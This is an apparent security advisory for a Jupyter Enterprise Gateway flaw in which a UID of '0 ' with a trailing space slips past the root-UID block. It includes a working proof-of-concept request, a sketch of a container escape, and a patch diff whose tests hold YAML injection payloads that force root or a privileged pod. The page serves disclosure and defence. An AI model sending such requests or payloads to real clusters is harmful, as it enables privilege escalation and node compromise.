VYPR
Critical severity9.8NVD Advisory· Published Jun 3, 2026· Updated Jun 3, 2026

Jupyter Enterprise Gateway: ContainerProcessProxy._enforce_prohibited_ids Bypass

CVE-2026-44180

Description

Summary

Jupyter Enterprise Gateway has a prohibited UID and GID feature that by default prevents launching kernels with UID or GID 0 (root). This can be bypassed. It is possible to launch kernels with a prohibited UID and/or GID by using a specially crafted KERNEL_UID or KERNEL_GID value.

The feature is described in the documentation:

https://github.com/jupyter-server/enterprise_gateway/blob/152c20f162f2fab700c04c8830ebf8c1e2e2217a/docs/source/operators/config-add-env.md?plain=1#L103-L107

https://github.com/jupyter-server/enterprise_gateway/blob/152c20f162f2fab700c04c8830ebf8c1e2e2217a/docs/source/operators/config-add-env.md?plain=1#L88-L92

https://github.com/jupyter-server/enterprise_gateway/blob/152c20f162f2fab700c04c8830ebf8c1e2e2217a/docs/source/operators/deploy-kubernetes.md?plain=1#L769

Details

The prohibited_uids and prohibited_uids are set based of the OS env var EG_PROHIBITED_UIDS and EG_PROHIBITED_GIDS, and default to the string 0.

https://github.com/jupyter-server/enterprise_gateway/blob/152c20f162f2fab700c04c8830ebf8c1e2e2217a/enterprise_gateway/services/processproxies/container.py#L29-L30

The checks https://github.com/jupyter-server/enterprise_gateway/blob/152c20f162f2fab700c04c8830ebf8c1e2e2217a/enterprise_gateway/services/processproxies/container.py#L113 and https://github.com/jupyter-server/enterprise_gateway/blob/152c20f162f2fab700c04c8830ebf8c1e2e2217a/enterprise_gateway/services/processproxies/container.py#L119 look for the user supplied KERNEL_UID / KERNEL_GID string in the prohibited_uids / prohibited_gids strings. These checks can be bypassed by including whitespace, for example the string 0 (trailing space).

The user supplied string is used in the Kubernetes manifest at https://github.com/jupyter-server/enterprise_gateway/blob/152c20f162f2fab700c04c8830ebf8c1e2e2217a/etc/kernel-launchers/kubernetes/scripts/kernel-pod.yaml.j2#L35 and https://github.com/jupyter-server/enterprise_gateway/blob/152c20f162f2fab700c04c8830ebf8c1e2e2217a/etc/kernel-launchers/kubernetes/scripts/kernel-pod.yaml.j2#L38 where they are parsed as an integer in the Jinja2 template - which will ignore the whitespace.

PoC

How it is meant to work

Trying 0 gets denied, as expected.

xh http://enterprise-gateway.bdawg.svc.cluster.local:8888/api/kernels name=python_kubernetes env:='{"KERNEL_POD_NAME":"bdawg", "KERNEL_UID": "0", "KERNEL_GID": "0"}'
HTTP/1.1 403 Kernel's UID value of '0' has been denied via EG_PROHIBITED_UIDS!
Content-Length: 94
Content-Type: application/json
Date: Mon, 14 Jul 2025 12:57:09 GMT
Server: TornadoServer/6.4.1
X-Content-Type-Options: nosniff
{
    "reason": "Kernel's UID value of '0' has been denied via EG_PROHIBITED_UIDS!",
    "message": ""
}
Exploit bypassing the checks

Using 0 with a trailing space, bypasses the check.

xh http://enterprise-gateway.bdawg.svc.cluster.local:8888/api/kernels name=python_kubernetes env:='{"KERNEL_POD_NAME":"bdawg", "KERNEL_UID": "0 ", "KERNEL_GID": "0 "}'
HTTP/1.1 201 Created
Content-Length: 172
Content-Type: application/json
Date: Mon, 14 Jul 2025 14:15:19 GMT
Location: /api/kernels/17eee032-994f-4dd2-8ade-87169c300a40
Server: TornadoServer/6.4.1
X-Content-Type-Options: nosniff
{
    "id": "17eee032-994f-4dd2-8ade-87169c300a40",
    "name": "python_kubernetes",
    "last_activity": "2025-07-14T14:15:21.468155Z",
    "execution_state": "starting",
    "connections": 0
}

The pod is successfully scheduled.

Inspecting the container we can see it is running as root:

kubectl exec -it pod/bdawg -- bash
(base) root@bdawg3:~# id
uid=0(root) gid=0(root) groups=0(root),100(users)

If we had not supplied the KERNEL_UID / KERNEL_GID the container would have been running as UID:GID 1000:100 (jovyan:users).

Impact

This input validation vulnerability allows running Jupyter kernels as root, which can be dangerous as it allows more attack surface, and may lead to container escapes, compromising the worker node and all workloads running on it. Repeated exploitation can compromise all worker nodes, and thus the entire Kubernetes cluster. It is possible to specify volume mounts, so one vector for a container escape is to use a hostPath R/W volume mount, use this UID/GID bypass to run as root, and then gain code execution in the underlying worker node by creating a crontab entry in the mounted host file system.

Organisations running Jupyter Enterprise Gateway to host Jupyter Kernels on at least Kubernetes clusters (I've tested this), and possibly on any other supported container orchestration systems or systems that utilise the KERNEL_UID and KERNEL_GID variables with the EG_PROHIBITED_UIDS and EG_PROHIBITED_GIDS feature.

Affected products

1

Patches

5
2258a41f9840

Fix YAML injection via KERNEL_* env vars (GHSA-cfw7-6c5v-2wjq)

https://github.com/jupyter-server/enterprise_gatewayLuciano ResendeApr 28, 2026Fixed in 3.3.0via ghsa-release-walk
7 files changed · +590 45
  • enterprise_gateway/services/kernels/handlers.py+13 7 modified
    @@ -18,6 +18,8 @@
     
     from ...mixins import CORSMixin, JSONErrorsMixin, TokenAuthorizationMixin
     
    +MAX_ENV_VALUE_LENGTH = 4096
    +
     
     class MainKernelHandler(
         TokenAuthorizationMixin, CORSMixin, JSONErrorsMixin, jupyter_server_handlers.MainKernelHandler
    @@ -66,13 +68,17 @@ async def post(self):
                 allowed_envs: list[str]
                 allowed_envs = model["env"].keys() if self.client_envs == ["*"] else self.client_envs
                 # Allow KERNEL_* args and those allowed by configuration.
    -            env.update(
    -                {
    -                    key: value
    -                    for key, value in model["env"].items()
    -                    if key.startswith("KERNEL_") or key in allowed_envs
    -                }
    -            )
    +            for key, value in model["env"].items():
    +                if key.startswith("KERNEL_") or key in allowed_envs:
    +                    if not isinstance(value, str):
    +                        raise tornado.web.HTTPError(
    +                            400, f"Environment variable '{key}' value must be a string"
    +                        )
    +                    if len(value) > MAX_ENV_VALUE_LENGTH:
    +                        raise tornado.web.HTTPError(
    +                            400, f"Environment variable '{key}' exceeds maximum length"
    +                        )
    +                    env[key] = value
     
                 # If kernel_headers are configured, fetch each of those and include in start request
                 kernel_headers = {}
    
  • enterprise_gateway/tests/test_yaml_injection.py+450 0 added
    @@ -0,0 +1,450 @@
    +# Copyright (c) Jupyter Development Team.
    +# Distributed under the terms of the Modified BSD License.
    +"""Tests for YAML injection vulnerability fix (GHSA-cfw7-6c5v-2wjq)."""
    +
    +import os
    +import unittest
    +
    +import yaml
    +from jinja2 import Environment, FileSystemLoader, select_autoescape
    +
    +TEMPLATE_DIR = os.path.join(
    +    os.path.dirname(__file__),
    +    "..",
    +    "..",
    +    "etc",
    +    "kernel-launchers",
    +    "kubernetes",
    +    "scripts",
    +)
    +
    +OPERATOR_TEMPLATE_DIR = os.path.join(
    +    os.path.dirname(__file__),
    +    "..",
    +    "..",
    +    "etc",
    +    "kernel-launchers",
    +    "operators",
    +    "scripts",
    +)
    +
    +YAML_PARSED_KERNEL_VARS = {"KERNEL_VOLUME_MOUNTS", "KERNEL_VOLUMES"}
    +
    +ALLOWED_K8S_KINDS = {
    +    "Pod",
    +    "Secret",
    +    "PersistentVolumeClaim",
    +    "PersistentVolume",
    +    "Service",
    +    "ConfigMap",
    +}
    +
    +
    +def yaml_safe_str(value):
    +    """Escape a value for safe inclusion in a YAML template."""
    +    if isinstance(value, str):
    +        return yaml.dump(value, default_style='"', width=10000).strip()
    +    if isinstance(value, (dict, list)):
    +        return yaml.dump(value, default_flow_style=True, width=10000).strip()
    +    # yaml.dump appends a document-end marker ("...\n") for scalars; strip it
    +    return yaml.dump(value, width=10000).replace("\n...", "").strip()
    +
    +
    +def _build_keywords(env_overrides: dict) -> dict:
    +    """Build a keywords dict from env_overrides using the fixed parsing logic."""
    +    keywords = {}
    +    for name, value in env_overrides.items():
    +        if name.startswith("KERNEL_"):
    +            if name in YAML_PARSED_KERNEL_VARS:
    +                parsed = yaml.safe_load(value)
    +                if isinstance(parsed, list) and all(isinstance(item, dict) for item in parsed):
    +                    keywords[name.lower()] = parsed
    +            else:
    +                keywords[name.lower()] = value
    +    return keywords
    +
    +
    +def _render_pod_template(keywords: dict) -> str:
    +    """Render the kernel-pod.yaml.j2 template with the yaml_safe filter."""
    +    j_env = Environment(
    +        loader=FileSystemLoader(os.path.normpath(TEMPLATE_DIR)),
    +        trim_blocks=True,
    +        lstrip_blocks=True,
    +        autoescape=select_autoescape(
    +            disabled_extensions=("j2", "yaml"),
    +            default_for_string=True,
    +            default=True,
    +        ),
    +    )
    +    j_env.filters["yaml_safe"] = yaml_safe_str
    +    return j_env.get_template("/kernel-pod.yaml.j2").render(**keywords)
    +
    +
    +def _base_env() -> dict:
    +    return {
    +        "KERNEL_POD_NAME": "test-pod",
    +        "KERNEL_NAMESPACE": "default",
    +        "KERNEL_ID": "aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee",
    +        "KERNEL_IMAGE": "elyra/kernel-py:3.2.3",
    +        "KERNEL_SERVICE_ACCOUNT_NAME": "default",
    +        "KERNEL_UID": "1000",
    +        "KERNEL_GID": "100",
    +    }
    +
    +
    +class TestYamlSafeStrFilter(unittest.TestCase):
    +    """Test the yaml_safe_str Jinja2 filter."""
    +
    +    def test_normal_string(self):
    +        result = yaml_safe_str("/home/jovyan")
    +        self.assertEqual(result, '"/home/jovyan"')
    +
    +    def test_string_with_quotes(self):
    +        result = yaml_safe_str('hello "world"')
    +        self.assertIn("hello", result)
    +        parsed = yaml.safe_load(f"key: {result}")
    +        self.assertEqual(parsed["key"], 'hello "world"')
    +
    +    def test_string_with_newlines_escaped(self):
    +        result = yaml_safe_str("line1\nline2\nline3")
    +        self.assertNotIn("\n", result.strip('"'))
    +        parsed = yaml.safe_load(f"key: {result}")
    +        self.assertEqual(parsed["key"], "line1\nline2\nline3")
    +
    +    def test_document_boundary_escaped(self):
    +        result = yaml_safe_str("before\n---\nafter")
    +        parsed_docs = list(yaml.safe_load_all(f"key: {result}"))
    +        self.assertEqual(len(parsed_docs), 1)
    +        self.assertEqual(parsed_docs[0]["key"], "before\n---\nafter")
    +
    +    def test_end_of_document_marker_escaped(self):
    +        result = yaml_safe_str("before\n...\nafter")
    +        parsed = yaml.safe_load(f"key: {result}")
    +        self.assertIn("...", parsed["key"])
    +
    +    def test_none_serialized_as_yaml_null(self):
    +        result = yaml_safe_str(None)
    +        self.assertEqual(result, "null")
    +        parsed = yaml.safe_load(f"key: {result}")
    +        self.assertIsNone(parsed["key"])
    +
    +    def test_bool_serialized_as_yaml_bool(self):
    +        self.assertEqual(yaml_safe_str(True), "true")
    +        self.assertEqual(yaml_safe_str(False), "false")
    +        parsed_true = yaml.safe_load(f"key: {yaml_safe_str(True)}")
    +        parsed_false = yaml.safe_load(f"key: {yaml_safe_str(False)}")
    +        self.assertIs(parsed_true["key"], True)
    +        self.assertIs(parsed_false["key"], False)
    +
    +    def test_numeric_serialized_correctly(self):
    +        self.assertEqual(yaml_safe_str(1000), "1000")
    +        self.assertEqual(yaml_safe_str(3.14), "3.14")
    +        parsed_int = yaml.safe_load(f"key: {yaml_safe_str(1000)}")
    +        parsed_float = yaml.safe_load(f"key: {yaml_safe_str(3.14)}")
    +        self.assertEqual(parsed_int["key"], 1000)
    +        self.assertAlmostEqual(parsed_float["key"], 3.14)
    +
    +    def test_dict_rendered_as_flow_mapping(self):
    +        result = yaml_safe_str({"name": "data", "mountPath": "/data"})
    +        parsed = yaml.safe_load(f"- {result}")
    +        self.assertEqual(parsed[0]["name"], "data")
    +        self.assertEqual(parsed[0]["mountPath"], "/data")
    +
    +    def test_empty_string(self):
    +        result = yaml_safe_str("")
    +        parsed = yaml.safe_load(f"key: {result}")
    +        self.assertEqual(parsed["key"], "")
    +
    +    def test_image_name_with_tag(self):
    +        result = yaml_safe_str("registry.example.com/org/image:v1.2.3")
    +        parsed = yaml.safe_load(f"key: {result}")
    +        self.assertEqual(parsed["key"], "registry.example.com/org/image:v1.2.3")
    +
    +
    +class TestEnvVarParsing(unittest.TestCase):
    +    """Test that env var parsing correctly distinguishes scalar vs structured vars."""
    +
    +    def test_scalar_vars_remain_strings(self):
    +        env = {"KERNEL_IMAGE": "nginx:latest", "KERNEL_UID": "1000"}
    +        keywords = _build_keywords(env)
    +        self.assertEqual(keywords["kernel_image"], "nginx:latest")
    +        self.assertIsInstance(keywords["kernel_image"], str)
    +        self.assertEqual(keywords["kernel_uid"], "1000")
    +        self.assertIsInstance(keywords["kernel_uid"], str)
    +
    +    def test_volume_mounts_parsed_as_list(self):
    +        env = {
    +            "KERNEL_VOLUME_MOUNTS": '[{"name": "data", "mountPath": "/data"}]',
    +        }
    +        keywords = _build_keywords(env)
    +        self.assertIsInstance(keywords["kernel_volume_mounts"], list)
    +        self.assertEqual(keywords["kernel_volume_mounts"][0]["name"], "data")
    +
    +    def test_volumes_parsed_as_list(self):
    +        env = {
    +            "KERNEL_VOLUMES": '[{"name": "data", "emptyDir": {}}]',
    +        }
    +        keywords = _build_keywords(env)
    +        self.assertIsInstance(keywords["kernel_volumes"], list)
    +
    +    def test_non_list_volume_rejected(self):
    +        env = {"KERNEL_VOLUME_MOUNTS": "not-a-list"}
    +        keywords = _build_keywords(env)
    +        self.assertNotIn("kernel_volume_mounts", keywords)
    +
    +    def test_list_of_strings_volume_rejected(self):
    +        """List of strings (not dicts) should be rejected to prevent injection via loop items."""
    +        env = {"KERNEL_VOLUME_MOUNTS": '["name: data\\nmountPath: /data"]'}
    +        keywords = _build_keywords(env)
    +        self.assertNotIn("kernel_volume_mounts", keywords)
    +
    +    def test_mixed_list_volume_rejected(self):
    +        """List containing both dicts and strings should be rejected."""
    +        env = {"KERNEL_VOLUME_MOUNTS": '[{"name": "ok"}, "injected\\nstring"]'}
    +        keywords = _build_keywords(env)
    +        self.assertNotIn("kernel_volume_mounts", keywords)
    +
    +    def test_yaml_safe_load_not_applied_to_scalars(self):
    +        env = {"KERNEL_WORKING_DIR": '"injected\\nvalue"'}
    +        keywords = _build_keywords(env)
    +        self.assertEqual(keywords["kernel_working_dir"], '"injected\\nvalue"')
    +        self.assertNotIn("\n", keywords["kernel_working_dir"])
    +
    +
    +class TestSecurityContextInjection(unittest.TestCase):
    +    """Test that securityContext injection via KERNEL_WORKING_DIR is blocked."""
    +
    +    def test_security_context_not_overridden(self):
    +        env = _base_env()
    +        env["KERNEL_WORKING_DIR"] = (
    +            '"/tmp\\"\\n\\nsecurityContext:\\n  runAsUser: 0\\n  runAsGroup: 0\\n  fsGroup: 100\\n"'
    +        )
    +        keywords = _build_keywords(env)
    +        rendered = _render_pod_template(keywords)
    +        docs = list(yaml.safe_load_all(rendered))
    +
    +        self.assertEqual(len(docs), 1)
    +        sc = docs[0]["spec"]["securityContext"]
    +        self.assertEqual(sc["runAsUser"], 1000)
    +        self.assertEqual(sc["runAsGroup"], 100)
    +
    +    def test_injection_via_kernel_image(self):
    +        env = _base_env()
    +        env["KERNEL_IMAGE"] = 'nginx"\nsecurityContext:\n  runAsUser: 0'
    +        keywords = _build_keywords(env)
    +        rendered = _render_pod_template(keywords)
    +        docs = list(yaml.safe_load_all(rendered))
    +
    +        self.assertEqual(len(docs), 1)
    +        sc = docs[0]["spec"]["securityContext"]
    +        self.assertEqual(sc["runAsUser"], 1000)
    +
    +    def test_injection_via_kernel_namespace(self):
    +        env = _base_env()
    +        env["KERNEL_NAMESPACE"] = 'default"\nsecurityContext:\n  runAsUser: 0'
    +        keywords = _build_keywords(env)
    +        rendered = _render_pod_template(keywords)
    +        docs = list(yaml.safe_load_all(rendered))
    +
    +        self.assertEqual(len(docs), 1)
    +        sc = docs[0]["spec"]["securityContext"]
    +        self.assertEqual(sc["runAsUser"], 1000)
    +
    +    def test_injection_via_volume_mounts_string_list_blocked_at_l1(self):
    +        """L1: list-of-strings in KERNEL_VOLUME_MOUNTS is rejected during parsing."""
    +        env = _base_env()
    +        env["KERNEL_VOLUME_MOUNTS"] = (
    +            '["{name: data, mountPath: /data}\\n  securityContext:\\n    runAsUser: 0"]'
    +        )
    +        keywords = _build_keywords(env)
    +        self.assertNotIn("kernel_volume_mounts", keywords)
    +
    +    def test_injection_via_volume_mounts_blocked_at_l2(self):
    +        """L2: even if a string slips into volume_mounts, yaml_safe filter escapes it."""
    +        env = _base_env()
    +        keywords = _build_keywords(env)
    +        keywords["kernel_volume_mounts"] = [
    +            "{name: data, mountPath: /data}\n  securityContext:\n    runAsUser: 0"
    +        ]
    +        rendered = _render_pod_template(keywords)
    +        docs = list(yaml.safe_load_all(rendered))
    +
    +        self.assertEqual(len(docs), 1)
    +        sc = docs[0]["spec"]["securityContext"]
    +        self.assertEqual(sc["runAsUser"], 1000)
    +        env["KERNEL_WORKING_DIR"] = (
    +            '/tmp\n...\n---\napiVersion: v1\nkind: Pod\nmetadata:\n'
    +            '  name: injected-pod\nspec:\n  containers:\n'
    +            '  - name: evil\n    image: nginx\n    securityContext:\n'
    +            '      privileged: true\n...\n'
    +        )
    +        keywords = _build_keywords(env)
    +        rendered = _render_pod_template(keywords)
    +        docs = [d for d in yaml.safe_load_all(rendered) if d is not None]
    +
    +        self.assertEqual(len(docs), 1, "Injected document should not create extra YAML documents")
    +        self.assertEqual(docs[0]["kind"], "Pod")
    +        self.assertEqual(docs[0]["metadata"]["name"], "test-pod")
    +
    +    def test_all_rendered_kinds_are_allowed(self):
    +        env = _base_env()
    +        keywords = _build_keywords(env)
    +        rendered = _render_pod_template(keywords)
    +        docs = [d for d in yaml.safe_load_all(rendered) if d is not None]
    +
    +        for doc in docs:
    +            self.assertIn(
    +                doc.get("kind"),
    +                ALLOWED_K8S_KINDS,
    +                f"Unexpected kind: {doc.get('kind')}",
    +            )
    +
    +    def test_duplicate_pod_kind_detected(self):
    +        """L3: if an attacker somehow injected a second Pod, document count validation catches it."""
    +        multi_pod_yaml = (
    +            "apiVersion: v1\nkind: Pod\nmetadata:\n  name: legit\n"
    +            "---\n"
    +            "apiVersion: v1\nkind: Pod\nmetadata:\n  name: evil\n"
    +        )
    +        docs = list(yaml.safe_load_all(multi_pod_yaml))
    +        kind_counts: dict[str, int] = {}
    +        for doc in docs:
    +            if doc:
    +                kind = doc.get("kind")
    +                kind_counts[kind] = kind_counts.get(kind, 0) + 1
    +
    +        self.assertEqual(kind_counts.get("Pod"), 2)
    +        self.assertGreater(kind_counts["Pod"], 1, "Should detect duplicate Pod documents")
    +
    +
    +class TestNormalOperation(unittest.TestCase):
    +    """Test that the fix preserves normal kernel launch functionality."""
    +
    +    def test_basic_pod_renders_correctly(self):
    +        env = _base_env()
    +        keywords = _build_keywords(env)
    +        rendered = _render_pod_template(keywords)
    +        docs = list(yaml.safe_load_all(rendered))
    +
    +        self.assertEqual(len(docs), 1)
    +        pod = docs[0]
    +        self.assertEqual(pod["kind"], "Pod")
    +        self.assertEqual(pod["metadata"]["name"], "test-pod")
    +        self.assertEqual(pod["metadata"]["namespace"], "default")
    +        self.assertEqual(pod["spec"]["containers"][0]["image"], "elyra/kernel-py:3.2.3")
    +        self.assertEqual(pod["spec"]["serviceAccountName"], "default")
    +
    +    def test_working_dir_set_correctly(self):
    +        env = _base_env()
    +        env["KERNEL_WORKING_DIR"] = "/home/jovyan/work"
    +        keywords = _build_keywords(env)
    +        rendered = _render_pod_template(keywords)
    +        pod = yaml.safe_load(rendered)
    +
    +        self.assertEqual(pod["spec"]["containers"][0]["workingDir"], "/home/jovyan/work")
    +
    +    def test_resource_limits_rendered(self):
    +        env = _base_env()
    +        env["KERNEL_CPUS"] = "500m"
    +        env["KERNEL_MEMORY"] = "1Gi"
    +        env["KERNEL_CPUS_LIMIT"] = "1"
    +        env["KERNEL_MEMORY_LIMIT"] = "2Gi"
    +        keywords = _build_keywords(env)
    +        rendered = _render_pod_template(keywords)
    +        pod = yaml.safe_load(rendered)
    +
    +        resources = pod["spec"]["containers"][0]["resources"]
    +        self.assertEqual(resources["requests"]["cpu"], "500m")
    +        self.assertEqual(resources["requests"]["memory"], "1Gi")
    +        self.assertEqual(resources["limits"]["cpu"], "1")
    +        self.assertEqual(resources["limits"]["memory"], "2Gi")
    +
    +    def test_security_context_with_uid_gid(self):
    +        env = _base_env()
    +        keywords = _build_keywords(env)
    +        rendered = _render_pod_template(keywords)
    +        pod = yaml.safe_load(rendered)
    +
    +        sc = pod["spec"]["securityContext"]
    +        self.assertEqual(sc["runAsUser"], 1000)
    +        self.assertEqual(sc["runAsGroup"], 100)
    +        self.assertEqual(sc["fsGroup"], 100)
    +
    +    def test_volume_mounts_rendered(self):
    +        env = _base_env()
    +        env["KERNEL_VOLUME_MOUNTS"] = '[{"name": "data-vol", "mountPath": "/data"}]'
    +        env["KERNEL_VOLUMES"] = '[{"name": "data-vol", "emptyDir": {}}]'
    +        keywords = _build_keywords(env)
    +        rendered = _render_pod_template(keywords)
    +        pod = yaml.safe_load(rendered)
    +
    +        mounts = pod["spec"]["containers"][0]["volumeMounts"]
    +        self.assertEqual(len(mounts), 1)
    +        self.assertEqual(mounts[0]["name"], "data-vol")
    +
    +        volumes = pod["spec"]["volumes"]
    +        self.assertEqual(len(volumes), 1)
    +        self.assertEqual(volumes[0]["name"], "data-vol")
    +
    +
    +class TestSparkOperatorTemplate(unittest.TestCase):
    +    """Test that the Spark operator template is also protected."""
    +
    +    def _render_operator_template(self, keywords: dict) -> str:
    +        j_env = Environment(
    +            loader=FileSystemLoader(os.path.normpath(OPERATOR_TEMPLATE_DIR)),
    +            trim_blocks=True,
    +            lstrip_blocks=True,
    +            autoescape=select_autoescape(
    +                disabled_extensions=("j2", "yaml"),
    +                default_for_string=True,
    +                default=True,
    +            ),
    +        )
    +        j_env.filters["yaml_safe"] = yaml_safe_str
    +        return j_env.get_template(
    +            "/sparkoperator.k8s.io-v1beta2.yaml.j2"
    +        ).render(**keywords)
    +
    +    def test_injection_via_kernel_image_blocked(self):
    +        keywords = {
    +            "kernel_resource_name": "test-spark",
    +            "kernel_image": 'nginx\nmalicious:\n  key: value',
    +            "kernel_id": "test-id",
    +            "spark_context_initialization_mode": "none",
    +            "eg_response_address": "1.2.3.4:8080",
    +            "eg_port_range": "0..0",
    +            "eg_public_key": "testkey",
    +            "kernel_service_account_name": "default",
    +            "kernel_executor_image": "elyra/kernel-py:3.2.3",
    +        }
    +        rendered = self._render_operator_template(keywords)
    +        doc = yaml.safe_load(rendered)
    +
    +        self.assertEqual(doc["kind"], "SparkApplication")
    +        self.assertIn("\n", doc["spec"]["image"])
    +        self.assertNotIn("malicious", doc)
    +
    +    def test_normal_spark_app_renders(self):
    +        keywords = {
    +            "kernel_resource_name": "test-spark",
    +            "kernel_image": "elyra/kernel-spark-py:3.2.3",
    +            "kernel_id": "test-id-123",
    +            "spark_context_initialization_mode": "lazy",
    +            "eg_response_address": "10.0.0.1:8080",
    +            "eg_port_range": "10000..11000",
    +            "eg_public_key": "abc123",
    +            "kernel_service_account_name": "spark-sa",
    +            "kernel_executor_image": "elyra/kernel-spark-py:3.2.3",
    +        }
    +        rendered = self._render_operator_template(keywords)
    +        doc = yaml.safe_load(rendered)
    +
    +        self.assertEqual(doc["kind"], "SparkApplication")
    +        self.assertEqual(doc["metadata"]["name"], "test-spark")
    +        self.assertEqual(doc["spec"]["image"], "elyra/kernel-spark-py:3.2.3")
    +        self.assertEqual(doc["spec"]["driver"]["serviceAccount"], "spark-sa")
    +
    +
    +if __name__ == "__main__":
    +    unittest.main()
    
  • etc/kernel-launchers/docker/scripts/launch_docker.py+6 0 modified
    @@ -2,6 +2,7 @@
     
     import argparse
     import os
    +import re
     import sys
     
     import urllib3
    @@ -27,6 +28,11 @@ def launch_docker_kernel(
         if image_name is None:
             sys.exit("ERROR - KERNEL_IMAGE not found in environment - kernel launch terminating!")
     
    +    if not re.match(
    +        r'^[a-zA-Z0-9][a-zA-Z0-9._\-/]*(:[a-zA-Z0-9._\-]+)?(@sha256:[a-f0-9]+)?$', image_name
    +    ):
    +        sys.exit(f"ERROR - KERNEL_IMAGE contains invalid characters: {image_name}")
    +
         # Container name is composed of KERNEL_USERNAME and KERNEL_ID
         container_name = os.environ.get("KERNEL_USERNAME", "") + "-" + kernel_id
     
    
  • etc/kernel-launchers/kubernetes/scripts/kernel-pod.yaml.j2+15 15 modified
    @@ -10,18 +10,18 @@
     apiVersion: v1
     kind: Pod
     metadata:
    -  name: "{{ kernel_pod_name }}"
    -  namespace: "{{ kernel_namespace }}"
    +  name: {{ kernel_pod_name | yaml_safe }}
    +  namespace: {{ kernel_namespace | yaml_safe }}
       labels:
    -    kernel_id: "{{ kernel_id }}"
    +    kernel_id: {{ kernel_id | yaml_safe }}
         app: enterprise-gateway
         component: kernel
         source: kernel-pod.yaml
       annotations:
         cluster-autoscaler.kubernetes.io/safe-to-evict: "false"
     spec:
       restartPolicy: Never
    -  serviceAccountName: "{{ kernel_service_account_name }}"
    +  serviceAccountName: {{ kernel_service_account_name | yaml_safe }}
     # NOTE: that using runAsGroup requires that feature-gate RunAsGroup be enabled.
     # WARNING: Only using runAsUser w/o runAsGroup or NOT enabling the RunAsGroup feature-gate
     # will result in the new kernel pod's effective group of 0 (root)! although the user will
    @@ -40,8 +40,8 @@ spec:
         fsGroup: 100
       {% endif %}
       containers:
    -  - image: "{{ kernel_image }}"
    -    name: "{{ kernel_pod_name }}"
    +  - image: {{ kernel_image | yaml_safe }}
    +    name: {{ kernel_pod_name | yaml_safe }}
         env:
     # Add any custom envs here that aren't already configured for the kernel's environment
     #    - name: MY_CUSTOM_ENV
    @@ -51,42 +51,42 @@ spec:
           {% if kernel_cpus is defined or kernel_memory is defined or kernel_gpus is defined %}
           requests:
             {% if kernel_cpus is defined %}
    -        cpu: "{{ kernel_cpus }}"
    +        cpu: {{ kernel_cpus | yaml_safe }}
             {% endif %}
             {% if kernel_memory is defined %}
    -        memory: "{{ kernel_memory }}"
    +        memory: {{ kernel_memory | yaml_safe }}
             {% endif %}
             {% if kernel_gpus is defined %}
    -        nvidia.com/gpu: "{{ kernel_gpus }}"
    +        nvidia.com/gpu: {{ kernel_gpus | yaml_safe }}
             {% endif %}
           {% endif %}
           {% if kernel_cpus_limit is defined or kernel_memory_limit is defined or kernel_gpus_limit is defined %}
           limits:
             {% if kernel_cpus_limit is defined %}
    -        cpu: "{{ kernel_cpus_limit }}"
    +        cpu: {{ kernel_cpus_limit | yaml_safe }}
             {% endif %}
             {% if kernel_memory_limit is defined %}
    -        memory: "{{ kernel_memory_limit }}"
    +        memory: {{ kernel_memory_limit | yaml_safe }}
             {% endif %}
             {% if kernel_gpus_limit is defined %}
    -        nvidia.com/gpu: "{{ kernel_gpus_limit }}"
    +        nvidia.com/gpu: {{ kernel_gpus_limit | yaml_safe }}
             {% endif %}
           {% endif %}
         {% endif %}
         {% if kernel_working_dir %}
    -    workingDir: "{{ kernel_working_dir }}"
    +    workingDir: {{ kernel_working_dir | yaml_safe }}
         {% endif %}
         volumeMounts:
     # Define any "unconditional" mounts here, followed by "conditional" mounts that vary per client
         {% if kernel_volume_mounts %}
           {% for volume_mount in kernel_volume_mounts %}
    -    - {{ volume_mount }}
    +    - {{ volume_mount | yaml_safe }}
           {% endfor %}
         {% endif %}
       volumes:
     # Define any "unconditional" volumes here, followed by "conditional" volumes that vary per client
       {% if kernel_volumes %}
         {% for volume in kernel_volumes %}
    -  - {{ volume }}
    +  - {{ volume | yaml_safe }}
         {% endfor %}
       {% endif %}
    
  • etc/kernel-launchers/kubernetes/scripts/launch_kubernetes.py+52 6 modified
    @@ -15,6 +15,26 @@
     
     KERNEL_POD_TEMPLATE_PATH = "/kernel-pod.yaml.j2"
     
    +ALLOWED_K8S_KINDS = {"Pod", "Secret", "PersistentVolumeClaim", "PersistentVolume", "Service", "ConfigMap"}
    +MAX_DOCUMENTS_PER_KIND = 1
    +YAML_PARSED_KERNEL_VARS = {"KERNEL_VOLUME_MOUNTS", "KERNEL_VOLUMES"}
    +
    +
    +def yaml_safe_str(value):
    +    """Escape a value for safe inclusion in a YAML template.
    +
    +    Uses PyYAML's own serializer to produce properly escaped output:
    +    - Strings are double-quoted with special characters escaped.
    +    - Dicts/lists are serialized as YAML flow mappings/sequences.
    +    - None, bools, and numbers are serialized to their YAML-canonical form.
    +    """
    +    if isinstance(value, str):
    +        return yaml.dump(value, default_style='"', width=10000).strip()
    +    if isinstance(value, (dict, list)):
    +        return yaml.dump(value, default_flow_style=True, width=10000).strip()
    +    # yaml.dump appends a document-end marker ("...\n") for scalars; strip it
    +    return yaml.dump(value, width=10000).replace("\n...", "").strip()
    +
     
     def generate_kernel_pod_yaml(keywords):
         """Return the kubernetes pod spec as a yaml string.
    @@ -35,9 +55,8 @@ def generate_kernel_pod_yaml(keywords):
                 default=True,
             ),
         )
    -    # jinja2 template substitutes template variables with None though keywords doesn't
    -    # contain corresponding item. Therefore, no need to check if any are left unsubstituted.
    -    # Kubernetes API server will validate the pod spec instead.
    +    j_env.filters["yaml_safe"] = yaml_safe_str
    +
         k8s_yaml = j_env.get_template(KERNEL_POD_TEMPLATE_PATH).render(**keywords)
     
         return k8s_yaml
    @@ -128,10 +147,20 @@ def launch_kubernetes_kernel(
         )
     
         # Walk env variables looking for names prefixed with KERNEL_.  When found, set corresponding keyword value
    -    # with name in lower case.
    +    # with name in lower case.  Only parse YAML for variables that legitimately carry structured data
    +    # (lists/dicts); treat all others as raw strings to prevent YAML injection attacks.
         for name, value in os.environ.items():
             if name.startswith("KERNEL_"):
    -            keywords[name.lower()] = yaml.safe_load(value)
    +            if name in YAML_PARSED_KERNEL_VARS:
    +                parsed = yaml.safe_load(value)
    +                if not isinstance(parsed, list) or not all(isinstance(item, dict) for item in parsed):
    +                    sys.exit(
    +                        f"ERROR - {name} must be a YAML list of mappings - "
    +                        f"kernel launch terminating!"
    +                    )
    +                keywords[name.lower()] = parsed
    +            else:
    +                keywords[name.lower()] = value
     
         # Substitute all template variable (wrapped with {{ }}) and generate `yaml` string.
         k8s_yaml = generate_kernel_pod_yaml(keywords)
    @@ -146,7 +175,24 @@ def launch_kubernetes_kernel(
         pod_template = None
